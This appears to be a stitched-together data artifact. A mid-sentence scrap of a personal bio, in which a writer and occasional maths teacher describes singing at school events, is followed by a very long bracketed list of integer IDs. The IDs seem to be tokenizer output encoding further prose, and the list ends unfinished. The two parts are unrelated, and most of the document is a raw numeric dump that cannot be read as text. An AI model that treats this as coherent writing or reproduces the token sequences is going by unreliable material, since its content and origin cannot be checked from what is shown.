as the other mics. I am a Writer and an occasional Math Teacher (Sir, what's the occasion?). I like to sing, having no instrumental talent (cannot even clap in time, and yes, I'm aware singing badly IS obnoxious). I have performed the finale to Les Miserables before an audience of 500. I have also sung before a similar audience (students, parents) renditions of 'I Will' (Beatles), 'Mr Cairo' (Jon Vangelis) and 'I am Australian' (Seekers). Now I seek another profession because the audience hates me ..
[ 1, 27822, 29892, 3979, 29871, 29900, 29945, 29892, 29871, 29906, 29900, 29896, 29906, 13, 13, 7185, 29871, 29945, 386, 2864, 7561, 1036, 10130, 13, 13, 29950, 14862, 12060, 3250, 322, 1784, 9796, 3639, 4699, 10167, 1131, 24511, 29889, 19298, 278, 1021, 2462, 306, 7743, 590, 4863, 376, 29924, 858, 708, 310, 2563, 2475, 29915, 29879, 10837, 344, 760, 29871, 29896, 1642, 22738, 29892, 12060, 16700, 526, 1781, 363, 366, 29889, 450, 901, 366, 505, 29892, 278, 5520, 366, 5735, 29889, 13, 25512, 13, 13, 29925, 4285, 10813, 3504, 785, 27822, 29892, 25363, 1096, 29871, 29900, 29945, 29892, 29906, 29900, 29896, 29906, 313, 29946, 29901, 29941, 29900, 314, 29897, 13, 13, 27501, 423, 28047, 538, 756, 2211, 11405, 304, 2050, 902, 5434, 1434, 1716, 12955, 310, 13212, 7845, 363, 278, 2186, 931, 445, 1629, 29889, 13, 13, 8439, 526, 1407, 8359, 16558, 2204, 886, 1048, 902, 4180, 29889, 13, 13, 8897, 4723, 1183, 21130, 3192, 5155, 1048, 902, 6297, 408, 263, 25008, 472, 14866, 1008, 669, 16965, 322, 278, 4444, 701, 310, 385, 21130, 1927, 15477, 363, 769, 8023, 18326, 319, 29956, 29965, 289, 2209, 18885, 13015, 29889, 13, 13, 1576, 5155, 674, 451, 748, 3448, 29889, 13, 13, 29979, 18358, 29892, 27623, 14713, 1976, 6618, 5429, 590, 23056, 3437, 11571, 8922, 29873, 393, 278, 9870, 2305, 526, 23437, 304, 1073, 278, 8760, 29889, 13, 13, 30015, 13468, 4225, 304, 1207, 263, 2989, 322, 2524, 29895, 3229, 408, 304, 825, 1183, 6363, 322, 825, 902, 5297, 29841, 471, 3995, 1976, 6618, 1497, 373, 8922, 29873, 30010, 29879, 11456, 1824, 29889, 13, 13, 18650, 9506, 472, 278, 3256, 4368, 29892, 373, 697, 19854, 29892, 393, 1183, 756, 3984, 839, 278, 13212, 29892, 297, 408, 1568, 408, 1183, 1497, 393, 746, 1183, 471, 1641, 15593, 287, 491, 14866, 1008, 322, 16965, 297, 3839, 29871, 29896, 29929, 29929, 29945, 599, 278, 13750, 892, 2998, 304, 278, 319, 29956, 29965, 24921, 3178, 13, 13, 8439, 366, 505, 372, 448, 278, 10676, 26142, 362, 393, 28047, 538, 3984, 839, 13212, 29889, 13, 13, 29954, 453, 538, 756, 19949, 393, 1346, 1609, 278, 931, 278, 13750, 1183, 14637, 304, 2996, 304, 590, 8570, 896, 892, 2307, 278, 4967, 310, 25501, 16129, 322, 22522, 8643, 13, 13, 6246, 278, 2407, 2444, 2821, 393, 727, 471, 694, 10974, 22522, 2745, 472, 3203, 263, 1629, 1156, 902, 22056, 472, 278, 16715, 4307, 9226, 750, 2307, 1754, 2821, 1009, 15258, 21838, 29889, 13, 13, 29943, 332, 721, 29892, 727, 338, 694, 10757, 393, 28047, 538, 470, 902, 22056, 16388, 304, 6985, 10974, 491, 13138, 2066, 607, 1795, 505, 6985, 287, 963, 29889, 13, 13, 7504, 3278, 304, 1976, 6618, 29892, 727, 338, 263, 2989, 29871, 29896, 29906, 7378, 297, 278, 17168, 3002, 1546, 22045, 28047, 538, 1641, 15593, 287, 322, 769, 10124, 14866, 1008, 322, 16965, 322, 278, 9870, 5244, 414, 7761, 448, 607, 471, 1641, 822, 336, 566, 287, 491, 13015, 29899, 14171, 9543, 310, 372, 322, 23415, 372, 304, 278, 18923, 29889, 13, 13, 30015, 6295, 278, 28306, 393, 278, 15512, 7668, 1754, 297, 278, 13212, 947, 451, 2833, 304, 9127, 411, 278, 17168, 3002, 373, 278, 970, 2407, 29889, 15950, 1497, 393, 29892, 306, 30010, 29885, 17762, 304, 2367, 278, 15512, 7668, 278, 14169, 310, 278, 7404, 29892, 541, 871, 565, 1183, 8128, 263, 2989, 322, 2524, 29895, 8252, 304, 278, 9870, 2305, 3995, 1976, 6618, 12520, 29889, 13, 13, 8809, 488, 278, 23933, 7993, 2243, 1878, 5220, 29892, 408, 28047, 538, 756, 2000, 372, 1258, 671, 278, 319, 29956, 29965, 1024, 29892, 278, 15883, 310, 278, 9833, 892, 451, 5429, 310, 967, 10379, 29889, 13, 13, 29923, 854, 3633, 292, 363, 28047, 538, 30010, 29879, 5566, 1509, 393, 1183, 471, 4123, 322, 1055, 573, 472, 278, 931, 310, 902, 15477, 411, 13015, 29892, 6909, 23329, 304, 9833, 5144, 3512, 4567, 322, 1183, 756, 1603, 304, 3211, 1906, 5144, 1058, 5714, 6909, 322, 5649, 17503, 825, 1183, 6363, 322, 746, 1183, 6363, 372, 29889, 13, 13, 29950, 4821, 5742, 278, 13382, 310, 931, 338, 451, 263, 16832, 29889, 13, 3047, 1432, 2462, 393, 14517, 29892, 901, 13499, 8946, 10701, 11176, 479, 322, 411, 1432, 716, 8424, 310, 5650, 1790, 1139, 2791, 5692, 29889, 13, 13, 29376, 29965, 5144, 29892, 763, 1906, 310, 278, 379, 14605, 322, 278, 315, 29924, 16359, 29965, 1058, 505, 884, 3595, 29199, 652, 1765, 287, 515, 1009, 4974, 287, 6437, 553, 7143, 6089, 29892, 408, 437, 599, 4648, 5834, 29889, 13, 13, 29899, 14568, 322, 14568, 515, 263, 9227, 310, 278, 951, 9202, 303, 12115, 21806, 915, 1058, 22405, 6033, 3801, 338, 1346, 29879, 492, 407, 708, 8643, 13, 13, 29899, 263, 16167, 4432, 16909, 1058, 22405, 6033, 3801, 338, 20662, 407, 708, 29889, 13, 13, 29899, 319, 341, 555, 265, 1058, 22405, 6033, 3801, 338, 1811, 304, 6095, 5589, 670, 4783, 30010, 29879, 12561, 310, 1641, 7178, 29889, 13, 13, 29899, 385, 429, 2265, 415, 515, 385, 5337, 594, 515, 1570, 29873, 402, 292, 4018, 5995, 292, 540, 8581, 1346, 29879, 3043, 292, 30024, 304, 1346, 29873, 575, 310, 17202, 310, 23035, 30024, 408, 263, 9712, 545, 7483, 391, 29889, 13, 13, 29899, 385, 6597, 515, 278, 7035, 368, 10478, 21869, 10920, 20102, 6445, 6033, 3801, 5934, 29871, 29946, 29955, 639, 1644, 310, 23035, 526, 373, 23633, 448, 470, 526, 1346, 29893, 579, 2674, 29879, 9363, 408, 16417, 1634, 9555, 5765, 1771, 790, 2162, 1371, 3730, 5133, 1372, 448, 322, 4550, 451, 5517, 304, 11719, 363, 1075, 29889, 13, 13, 12432, 790, 2162, 274, 3246, 825, 540, 16726, 526, 6455, 310, 263, 1472, 1051, 310, 6033, 3801, 8898, 285, 3466, 5685, 567, 29892, 411, 23622, 1735, 23425, 29892, 310, 3236, 29889, 940, 4083, 278, 1855, 6033, 3801, 338, 2898, 304, 1284, 29889, 13, 13, 1576, 1556, 6374, 2712, 1771, 790, 2162, 508, 1348, 310, 338, 393, 6033, 3801, 756, 4240, 263, 341, 555, 265, 6586, 313, 4187, 1838, 30010, 29873, 864, 304, 5353, 670, 22629, 854, 993, 10847, 29897, 322, 408, 16167, 20221, 3796, 411, 14189, 1446, 313, 4187, 756, 1286, 3939, 467, 13, 13, 2887, 263, 4682, 373, 278, 767, 1286, 21351, 411, 4107, 2261, 547, 310, 4250, 3304, 297, 278, 4797, 11719, 29892, 372, 471, 385, 15129, 298, 905, 300, 4982, 29889, 10575, 6033, 3801, 8206, 1283, 263, 5401, 29892, 16417, 9014, 414, 674, 367, 24293, 3276, 448, 470, 25617, 23035, 1818, 367, 10395, 29892, 470, 1584, 4319, 29889, 13, 13, 29950, 275, 6589, 260, 487, 472, 278, 18187, 310, 697, 310, 278, 1556, 20502, 5626, 363, 22053, 2172, 550, 813, 278, 1492, 310, 472, 3203, 29871, 29945, 7284, 25447, 267, 322, 25106, 12272, 433, 1133, 2305, 304, 736, 304, 1009, 19525, 1705, 17774, 297, 825, 338, 1286, 11996, 29889, 13, 13, 30015, 29902, 626, 263, 25447, 29872, 29892, 541, 306, 626, 8471, 297, 8292, 284, 8083, 29889, 306, 4658, 393, 278, 3122, 10253, 322, 15853, 29874, 338, 22053, 457, 29889, 1126, 278, 916, 5633, 338, 11996, 3995, 3237, 13896, 294, 1497, 297, 278, 15593, 373, 11996, 30010, 29879, 17368, 29871, 29906, 373, 28728, 29889, 1346, 29902, 864, 304, 1074, 14795, 287, 29889, 739, 338, 590, 1492, 304, 1074, 372, 29892, 541, 451, 304, 5735, 727, 29889, 13, 13, 30015, 3596, 825, 591, 864, 338, 304, 10127, 385, 7417, 22053, 262, 713, 2106, 373, 278, 5884, 3842, 16404, 491, 11996, 297, 29871, 29896, 29929, 29953, 29955, 411, 6932, 23204, 408, 967, 7483, 3178, 13, 13, 1666, 2818, 292, 304, 278, 281, 2247, 29886, 949, 24905, 29876, 362, 310, 670, 6589, 29892, 3237, 13896, 294, 471, 11826, 304, 972, 29891, 540, 27943, 287, 278, 1492, 310, 736, 363, 22053, 2172, 550, 29892, 5934, 540, 471, 4653, 292, 263, 7333, 9426, 393, 1258, 451, 2755, 263, 1735, 297, 8898, 29889, 13, 13, 8439, 338, 694, 4060, 297, 607, 445, 338, 25204, 6490, 6354, 363, 970, 26202, 304, 22332, 1296, 29889, 1126, 892, 263, 5874, 11050, 304, 2244, 363, 1316, 7418, 29892, 278, 8210, 3158, 310, 278, 970, 26202, 723, 367, 3390, 3730, 304, 4845, 457, 278, 2009, 29889, 13, 13, 29902, 505, 10959, 263, 5497, 306, 4520, 5683, 1833, 4723, 515, 590, 4344, 30010, 29879, 3762, 23941, 393, 1009, 27335, 674, 451, 367, 5007, 738, 6589, 313, 481, 442, 515, 2498, 10468, 284, 6743, 29897, 297, 278, 1095, 310, 1629, 13676, 445, 1629, 29889, 910, 2794, 393, 8041, 674, 505, 263, 1407, 885, 424, 2407, 310, 278, 1629, 30010, 29879, 664, 10734, 746, 372, 5304, 304, 4266, 391, 10161, 763, 365, 2891, 29923, 322, 1616, 29889, 306, 505, 263, 1487, 297, 8273, 577, 670, 1095, 310, 1629, 3461, 363, 445, 1629, 338, 5051, 4100, 29889, 13, 13, 29902, 1348, 6721, 8041, 304, 363, 1484, 16705, 363, 278, 1629, 577, 393, 27335, 508, 679, 263, 2846, 901, 17208, 3697, 263, 2078, 271, 400, 5086, 10225, 310, 10257, 1608, 373, 278, 760, 310, 278, 27335, 322, 385, 875, 277, 944, 6042, 2877, 393, 338, 925, 4805, 4194, 6275, 564, 9102, 424, 29889, 960, 306, 750, 1898, 445, 2656, 310, 260, 17911, 297, 278, 2024, 17535, 448, 2143, 4746, 304, 4866, 13676, 363, 13154, 1363, 306, 5131, 901, 6909, 448, 306, 723, 8959, 505, 1063, 269, 547, 287, 313, 392, 1492, 3730, 577, 467, 13, 13, 1349, 968, 27335, 1854, 505, 16187, 1009, 8041, 263, 3109, 265, 448, 408, 297, 920, 304, 671, 1584, 4344, 408, 3495, 1179, 363, 274, 1161, 29889, 13, 13, 8015, 2859, 3303, 3900, 5593, 11004, 8104, 295, 1085, 15457, 4052, 29903, 635, 338, 278, 21178, 2734, 363, 9899, 374, 1808, 402, 2593, 4339, 30010, 12949, 297, 11559, 29889, 3872, 30010, 29873, 2244, 902, 1048, 278, 9281, 1560, 799, 515, 13973, 310, 278, 19941, 448, 310, 278, 1346, 4495, 373, 5866, 8643, 13, 13, 29967, 29965, 5265, 29909, 28047, 538, 338, 11584, 297, 6483, 7458, 975, 278, 2243, 1878, 5220, 1183, 9213, 1653, 363, 902, 769, 8023, 18326, 29892, 9833, 289, 2209, 18885, 13015, 29889, 13, 13, 1576, 15512, 7668, 2444, 304, 505, 3984, 839, 13212, 1833, 498, 1295, 3250, 29892, 9508, 292, 278, 438, 407, 4490, 22600, 304, 5995, 1346, 1552, 432, 2857, 338, 714, 30024, 1048, 902, 5297, 29841, 297, 902, 8023, 18326, 30010, 29879, 885, 314, 29889, 13, 13, 29954, 453, 538, 471, 4433, 297, 13212, 2020, 1183, 1258, 451, 748, 304, 10974, 448, 408, 278, 4307, 6858, 448, 1156, 6509, 902, 8023, 18326, 1304, 278, 2243, 1878, 5220, 304, 18290, 1283, 395, 29946, 29900, 29900, 29892, 29900, 29900, 29900, 29892, 805, 2548, 395, 29896, 29900, 29900, 29892, 29900, 29900, 29900, 304, 15649, 263, 3699, 411, 263, 3081, 310, 1098, 25252, 16277, 287, 491, 28047, 538, 29889, 13, 13, 29954, 453, 538, 29901, 1346, 2059, 278, 931, 278, 13750, 1183, 14637, 304, 2996, 304, 590, 8570, 896, 892, 2307, 278, 4967, 310, 25501, 16129, 322, 22522, 3178, 13, 13, 6246, 338, 393, 1565, 29973, 28047, 538, 471, 867, 24455, 491, 26230, 10404, 22056, 310, 902, 4307, 9226, 297, 3839, 29871, 29896, 29929, 29929, 29945, 1048, 278, 5220, 29889, 512, 3111, 29892, 1183, 20186, 1183, 6363, 297, 29871, 29896, 29929, 29929, 29945, 1554, 471, 4857, 546, 29889, 13, 13, 30015, 29902, 8429, 263, 1776, 393, 306, 750, 451, 1063, 316, 1997, 411, 15993, 368, 322, 29892, 2729, 373, 393, 1776, 29892, 306, 9698, 263, 9443, 306, 750, 1250, 769, 29892, 29871, 29896, 29955, 2440, 8020, 3995, 1183, 1497, 29889, 1205, 372, 9007, 30010, 29873, 2745, 5683, 29871, 29896, 29929, 29929, 29953, 393, 738, 10974, 22522, 4687, 29889, 13, 13, 29950, 287, 2330, 5569, 8571, 267, 727, 338, 263, 1855, 1108, 411, 278, 5566, 1509, 22045, 28047, 538, 4846, 13212, 1833, 4723, 363, 451, 6655, 292, 10974, 304, 902, 4642, 8023, 18326, 30010, 29879, 5227, 566, 29879, 29901, 13, 13, 3644, 28047, 538, 2794, 491, 445, 1234, 393, 278, 28750, 310, 278, 13750, 393, 2996, 304, 902, 8570, 471, 3111, 29899, 2008, 3266, 29871, 29896, 29929, 29929, 29945, 29892, 607, 338, 746, 902, 9226, 471, 260, 16242, 1283, 322, 4687, 385, 7463, 410, 915, 29892, 1183, 338, 25257, 373, 902, 1473, 1298, 29889, 13, 13, 1576, 2407, 3697, 393, 727, 471, 694, 25501, 16129, 322, 694, 22522, 964, 278, 2243, 1878, 5220, 472, 393, 931, 1363, 278, 5220, 30010, 29879, 10379, 750, 451, 1063, 766, 15603, 304, 278, 319, 29956, 29965, 26001, 29892, 470, 304, 14212, 18923, 3045, 13, 13, 28350, 3189, 284, 654, 756, 24432, 22045, 28047, 538, 5957, 263, 2989, 22765, 653, 8252, 975, 902, 5297, 29841, 297, 263, 9833, 2243, 1878, 5220, 1183, 9213, 1653, 297, 29871, 29896, 29929, 29929, 29906, 363, 902, 769, 8023, 18326, 29892, 9833, 289, 2209, 18885, 13015, 29892, 304, 15544, 3692, 1183, 1122, 505, 3984, 839, 22765, 29889, 13, 13, 1576, 19626, 338, 884, 24795, 278, 15512, 7668, 363, 278, 3229, 304, 3211, 716, 5155, 373, 902, 7134, 310, 278, 2243, 1878, 5220, 29892, 1156, 25136, 373, 3111, 29871, 29906, 29941, 393, 1183, 750, 694, 4340, 5297, 29841, 1156, 13138, 9848, 373, 967, 25012, 408, 263, 18096, 472, 4307, 9226, 14866, 1008, 669, 16965, 29889, 13, 13, 30015, 29902, 626, 25738, 1549, 278, 22765, 263, 2989, 322, 2524, 29895, 8252, 515, 278, 15512, 7668, 373, 278, 1407, 10676, 2228, 310, 902, 5297, 29841, 297, 263, 9833, 2243, 1878, 5220, 607, 16831, 23244, 822, 336, 566, 287, 278, 9870, 5244, 414, 7761, 310, 21006, 310, 17202, 310, 17208, 3995, 2739, 347, 16880, 5429, 450, 9870, 22600, 29889, 13, 13, 30015, 29902, 626, 18066, 292, 902, 7786, 1873, 310, 4959, 29892, 491, 16811, 304, 10701, 393, 505, 451, 1063, 9251, 1925, 304, 902, 491, 263, 24452, 1048, 902, 5297, 29841, 297, 445, 2919, 2243, 1878, 5220, 322, 902, 7134, 310, 967, 5858, 3178, 13, 13, 29954, 453, 538, 30010, 29879, 10672, 304, 748, 304, 10974, 1122, 505, 9213, 902, 429, 29899, 19415, 18326, 679, 3448, 411, 901, 274, 1161, 29901, 13, 13, 29949, 407, 4490, 664, 6689, 5302, 805, 23195, 1171, 14713, 1976, 6618, 1497, 22600, 727, 471, 263, 2989, 1629, 1546, 746, 341, 29879, 28047, 538, 471, 15593, 287, 491, 14866, 1008, 669, 16965, 322, 746, 278, 319, 29956, 29965, 24432, 967, 5227, 566, 410, 915, 310, 3839, 29871, 29896, 29929, 29929, 29953, 29889, 13, 13, 797, 278, 26314, 292, 3785, 29892, 278, 1023, 9833, 24921, 5239, 278, 22963, 4727, 2875, 18093, 411, 2243, 1878, 5220, 6909, 322, 8126, 278, 8469, 29879, 310, 1048, 395, 29947, 29900, 29892, 29900, 29900, 29900, 29889, 13, 13, 10401, 21869, 17677, 8459, 297, 29871, 29896, 29929, 29947, 29900, 304, 1735, 330, 15451, 515, 12528, 261, 304, 1370, 1050, 29892, 263, 716, 5534, 1370, 4056, 13433, 471, 6345, 29892, 337, 552, 371, 411, 967, 1914, 6586, 313, 1552, 8291, 511, 263, 3500, 4135, 29892, 313, 1552, 4124, 29887, 6170, 358, 284, 349, 3870, 373, 2233, 6490, 10726, 511, 322, 263, 5534, 1370, 4056, 18781, 6614, 5516, 7808, 9382, 408, 23622, 9638, 2879, 29889, 21782, 728, 25618, 297, 8261, 29892, 21180, 17068, 10916, 892, 1999, 2795, 363, 278, 1370, 4056, 322, 750, 304, 5146, 363, 4940, 9941, 3364, 267, 491, 13138, 5518, 22874, 362, 304, 6460, 19079, 408, 6584, 749, 29889, 315, 329, 1259, 7933, 8697, 10489, 953, 6847, 3897, 278, 716, 26630, 2646, 309, 29889, 2973, 263, 14294, 8805, 472, 1009, 1250, 29879, 29892, 1438, 15281, 2879, 16531, 21006, 310, 11118, 1080, 310, 17208, 515, 1055, 573, 4095, 1860, 393, 16356, 1009, 10847, 373, 2306, 3131, 310, 11118, 1080, 310, 2305, 29889, 1939, 2181, 375, 1664, 471, 3926, 577, 11828, 29889, 13, 13, 1576, 2643, 471, 18561, 29889, 960, 278, 1661, 29899, 6596, 347, 874, 3282, 30010, 29873, 3588, 7389, 29892, 1749, 4344, 322, 4595, 11991, 723, 3700, 263, 23927, 373, 8437, 29889, 450, 18781, 6614, 429, 27820, 630, 322, 3165, 2638, 630, 269, 1547, 1199, 322, 972, 4285, 29889, 12440, 1230, 8386, 892, 451, 20341, 630, 322, 29892, 988, 1950, 29892, 892, 21301, 287, 29889, 7440, 4856, 3585, 278, 6501, 24646, 29973, 13, 13, 4373, 1171, 947, 451, 429, 9921, 403, 278, 1462, 23881, 310, 27836, 448, 263, 885, 24258, 297, 445, 14750, 575, 14981, 3889, 4234, 29889, 306, 626, 5279, 297, 3261, 2738, 2980, 411, 385, 946, 3819, 6136, 297, 410, 3471, 17068, 269, 1547, 1199, 322, 380, 361, 1847, 27836, 373, 445, 2228, 29889, 306, 626, 3216, 491, 24332, 616, 537, 11780, 451, 304, 1827, 901, 472, 278, 3256, 373, 445, 766, 3874, 346, 1319, 4218, 304, 12566, 278, 1370, 4056, 885, 598, 491, 8939, 29881, 1847, 2089, 16726, 29892, 8937, 292, 2821, 10757, 322, 1162, 29891, 19914, 3209, 950, 1560, 15451, 448, 541, 29892, 491, 4177, 29892, 306, 697, 2462, 674, 29889, 476, 20817, 12080, 29889, 13, 13, 6246, 306, 881, 29383, 1570, 1171, 445, 3153, 946, 3819, 4893, 6221, 1922, 2634, 479, 472, 6273, 322, 10757, 393, 540, 29892, 2086, 29892, 3061, 2925, 29889, 306, 508, 871, 4966, 393, 372, 674, 1207, 278, 10171, 310, 2675, 1156, 263, 4642, 16417, 28942, 408, 1532, 29889, 9531, 723, 901, 9436, 22222, 967, 1010, 764, 284, 310, 967, 1565, 10655, 322, 310, 278, 12502, 310, 3889, 12032, 29892, 9531, 723, 901, 18880, 24396, 372, 304, 970, 8177, 293, 1297, 29901, 13, 13, 4597, 13158, 2197, 363, 278, 5534, 1370, 4056, 13433, 29892, 967, 27303, 505, 4687, 304, 2615, 528, 557, 29891, 29892, 322, 278, 29436, 29892, 1784, 310, 6029, 505, 5714, 1009, 17643, 322, 1568, 310, 1009, 17173, 29892, 526, 19035, 10847, 29889, 19662, 344, 29892, 902, 7492, 9638, 2879, 505, 1063, 6820, 278, 3804, 304, 1784, 310, 278, 3107, 354, 2478, 5439, 297, 278, 5641, 4174, 289, 1821, 29889, 2688, 1033, 451, 367, 4047, 9223, 13, 13, 3045, 1552, 4908, 5075, 310, 278, 23622, 25012, 4047, 2705, 5492, 385, 427, 8798, 506, 284, 393, 17845, 694, 2313, 824, 1821, 14451, 297, 20431, 5534, 6238, 3698, 515, 278, 6763, 310, 29871, 29896, 29929, 29929, 29955, 2745, 3111, 445, 1629, 29889, 13, 13, 4013, 3817, 1387, 471, 443, 799, 386, 287, 491, 278, 902, 7492, 19656, 29892, 278, 23331, 18623, 29892, 607, 11520, 714, 393, 445, 3785, 471, 310, 1048, 278, 1021, 14385, 408, 746, 6238, 3698, 11492, 1546, 29871, 29896, 29929, 29947, 29900, 304, 29871, 29896, 29929, 29929, 29953, 29889, 13, 13, 2776, 3236, 29892, 278, 12962, 1880, 3691, 9197, 892, 4996, 304, 1708, 1623, 278, 26002, 310, 445, 19957, 29889, 5241, 10920, 310, 278, 2233, 326, 1845, 403, 972, 290, 3381, 17049, 372, 471, 304, 367, 3806, 322, 29892, 540, 1663, 12652, 29892, 29871, 29896, 29945, 470, 29871, 29896, 29953, 2440, 338, 451, 263, 7282, 3785, 29889, 13, 13, 29979, 300, 297, 29871, 29906, 29900, 29900, 29929, 540, 1497, 393, 263, 1346, 1217, 701, 1328, 534, 355, 756, 304, 6773, 363, 263, 3001, 310, 29871, 29896, 29945, 2440, 1434, 591, 679, 6365, 1255, 8643, 1205, 393, 471, 769, 322, 445, 338, 1286, 322, 540, 338, 451, 1048, 304, 14074, 670, 13433, 3763, 1363, 278, 10757, 1838, 30010, 29873, 2304, 278, 1426, 29889, 13, 13, 2855, 29892, 310, 3236, 29892, 727, 526, 2337, 429, 841, 29884, 1218, 14209, 29889, 1260, 405, 1789, 322, 997, 405, 1099, 526, 727, 746, 366, 817, 963, 29892, 304, 367, 20898, 746, 6238, 3698, 526, 1370, 4056, 470, 21832, 565, 896, 526, 12528, 292, 29889, 1126, 29892, 591, 30010, 345, 750, 263, 2407, 826, 20009, 286, 2152, 29889, 1205, 2253, 451, 3585, 278, 14280, 393, 24206, 27943, 267, 14455, 278, 14890, 701, 322, 26603, 372, 7062, 29892, 470, 278, 2407, 5459, 279, 20009, 14890, 11581, 29889, 13, 13, 29934, 1624, 591, 1818, 11621, 304, 8314, 30010, 29879, 2233, 6490, 10726, 11444, 2420, 4812, 1078, 1058, 29892, 2750, 278, 10757, 29892, 505, 20115, 263, 610, 519, 25236, 5670, 303, 555, 8564, 29891, 304, 5534, 1370, 4056, 29889, 13, 13, 4178, 3203, 278, 5745, 766, 455, 2701, 526, 12515, 278, 10847, 491, 19310, 5921, 825, 11286, 278, 330, 26265, 322, 29892, 988, 1950, 29892, 2703, 5367, 393, 607, 1838, 30010, 29873, 29889, 1570, 29892, 1034, 307, 4089, 1230, 20474, 800, 13389, 281, 2247, 29886, 949, 970, 537, 29889, 960, 278, 1021, 1284, 886, 526, 2678, 3240, 1461, 287, 363, 10225, 310, 16021, 12912, 473, 29892, 896, 526, 3763, 6068, 304, 25417, 1728, 3440, 29889, 13, 13, 1576, 9226, 4083, 393, 278, 16611, 593, 595, 756, 884, 270, 1160, 6419, 5001, 8818, 491, 901, 1135, 6479, 294, 2857, 6068, 363, 297, 967, 7145, 29899, 6360, 23562, 2767, 29892, 5492, 1833, 4098, 29889, 13, 13, 30015, 4920, 18616, 4340, 8898, 3620, 29892, 591, 1074, 29871, 29906, 29900, 29896, 29906, 29899, 29896, 29941, 30010, 29879, 24936, 29899, 1454, 1190, 11242, 14712, 964, 263, 274, 1161, 14407, 822, 293, 277, 310, 395, 29946, 29889, 29906, 11197, 29889, 2193, 338, 395, 29945, 29889, 29941, 11197, 15029, 1135, 6479, 294, 2857, 29821, 19416, 3995, 372, 4083, 29889, 13, 13, 1576, 9226, 23347, 2582, 674, 367, 15029, 297, 29871, 29906, 29900, 29896, 29941, 29899, 29896, 29946, 29892, 408, 777, 310, 278, 697, 29899, 2696, 14505, 29879, 304, 445, 1629, 30010, 29879, 23562, 1518, 533, 29892, 29263, 278, 23562, 822, 293, 277, 304, 395, 29945, 29889, 29896, 11197, 29892, 9401, 411, 278, 29821, 579, 395, 29906, 29889, 29906, 11197, 1190, 11242, 29889, 13, 13, 1576, 6924, 3291, 1244, 526, 29901, 13, 13, 29899, 920, 1033, 278, 10354, 367, 577, 297, 2388, 300, 296, 408, 304, 2874, 263, 8818, 393, 1153, 4637, 871, 263, 15958, 310, 278, 6909, 372, 3806, 29973, 13, 13, 29899, 920, 1033, 278, 10354, 367, 577, 25527, 2222, 408, 304, 1153, 384, 701, 822, 293, 1169, 1584, 297, 263, 1375, 292, 1045, 290, 322, 411, 263, 15678, 26504, 29973, 13, 13, 29899, 920, 1033, 16715, 367, 577, 18864, 386, 7532, 448, 1286, 805, 2548, 395, 29896, 29900, 29900, 24464, 263, 1629, 901, 448, 408, 304, 4418, 304, 12021, 263, 2323, 1190, 11242, 1951, 967, 8271, 297, 29871, 29906, 29900, 29900, 29955, 29973, 13, 13, 2855, 727, 338, 967, 4207, 14596, 2228, 29901, 13, 13, 29899, 920, 1033, 278, 10354, 2867, 3447, 1790, 8271, 11640, 448, 304, 736, 278, 7038, 657, 304, 1190, 11242, 445, 1629, 29892, 26622, 1217, 565, 29879, 29892, 694, 541, 29879, 30024, 29973, 13, 13, 6246, 727, 338, 697, 916, 1298, 304, 1207, 1048, 445, 9391, 11640, 29889, 13, 13, 29954, 453, 538, 8735, 19492, 267, 592, 408, 4856, 1058, 2143, 2506, 3598, 25362, 29879, 304, 263, 18755, 1090, 12959, 29892, 304, 1925, 372, 286, 789, 368, 29889, 2439, 26508, 573, 19848, 1090, 12959, 304, 1827, 825, 30010, 29879, 19192, 29892, 451, 1565, 448, 322, 4966, 304, 4105, 2256, 2712, 714, 565, 470, 746, 278, 8760, 7146, 5304, 714, 29889, 512, 445, 1183, 338, 9213, 491, 825, 263, 4642, 14866, 1008, 669, 16965, 18096, 2748, 11682, 29901, 13, 13, 29902, 1348, 1183, 756, 263, 1407, 16424, 4060, 310, 902, 1914, 28410, 322, 1183, 758, 25534, 393, 1776, 304, 1906, 1058, 723, 1223, 737, 372, 29889, 13, 13, 1349, 852, 1058, 1838, 30010, 29873, 1584, 1999, 1878, 746, 21751, 287, 411, 263, 23332, 277, 508, 1207, 1035, 7193, 7404, 1009, 1914, 6577, 29887, 882, 29889, 13, 13, 9526, 6455, 310, 28047, 538, 25362, 292, 304, 825, 30010, 29879, 19192, 29892, 3265, 1135, 1565, 29892, 6839, 470, 12021, 519, 29901, 13, 13, 29899, 1346, 12711, 674, 367, 694, 22004, 8818, 1090, 263, 5874, 306, 3275, 30024, 13, 13, 29899, 278, 563, 295, 2147, 519, 11640, 304, 7417, 16379, 11571, 4624, 19501, 363, 9619, 7606, 758, 15060, 358, 15483, 373, 599, 11293, 347, 14884, 297, 14523, 363, 670, 11719, 29889, 13, 13, 29899, 28047, 538, 30010, 29879, 5995, 297, 29871, 29906, 29900, 29900, 29929, 393, 727, 471, 26622, 1217, 10757, 30024, 310, 437, 29920, 575, 310, 13006, 2305, 1641, 301, 2955, 304, 1009, 4892, 29879, 29889, 13, 13, 29899, 28047, 538, 30010, 29879, 5995, 297, 29871, 29906, 29900, 29900, 29955, 393, 902, 5297, 29841, 411, 278, 10307, 391, 29474, 10761, 1346, 13011, 263, 1472, 1629, 8020, 9363, 11149, 746, 1346, 29902, 471, 263, 16372, 8368, 30024, 2599, 1346, 1595, 29899, 2230, 28238, 936, 322, 19185, 664, 30024, 363, 445, 1346, 16529, 1218, 12459, 9363, 746, 297, 2114, 278, 10307, 391, 29474, 471, 263, 24818, 2318, 19912, 304, 6963, 4642, 5144, 310, 278, 20473, 391, 9173, 964, 278, 16715, 9173, 29892, 322, 28047, 538, 750, 1063, 373, 967, 10643, 21118, 29892, 2894, 5921, 4959, 322, 6820, 12032, 267, 29892, 322, 9886, 263, 4509, 2745, 29871, 29906, 29900, 29900, 29906, 29889, 13, 13, 29899, 28047, 538, 30010, 29879, 10324, 3240, 441, 304, 5155, 373, 278, 319, 29956, 29965, 885, 24258, 393, 1183, 30010, 29879, 7699, 278, 5155, 297, 902, 3111, 29871, 29906, 29900, 29896, 29906, 3965, 21362, 448, 263, 2373, 2705, 443, 3009, 3229, 29889, 13, 13, 29899, 28047, 538, 21130, 3460, 29035, 975, 902, 28399, 310, 5310, 317, 492, 2496, 491, 285, 1338, 873, 1560, 799, 292, 15293, 13896, 1501, 408, 263, 1346, 26737, 468, 948, 391, 8643, 13, 13, 4300, 9632, 13, 13, 4035, 13086, 1763, 13, 13, 29943, 2952, 414, 13, 13, 4300, 29880, 1061, 13, 13, 28173, 2191, 13, 13, 29902, 29915, 29885, 4148, 310, 5298, 297, 263, 8905, 491, 278, 15312, 1230, 4785, 625, 263, 1335, 5298, 310, 278, 2787, 297, 263, 8905, 491, 278, 15312, 1230, 4785, 625, 29889, 13, 13, 29902, 29915, 29885, 278, 15312, 1230, 4785, 625, 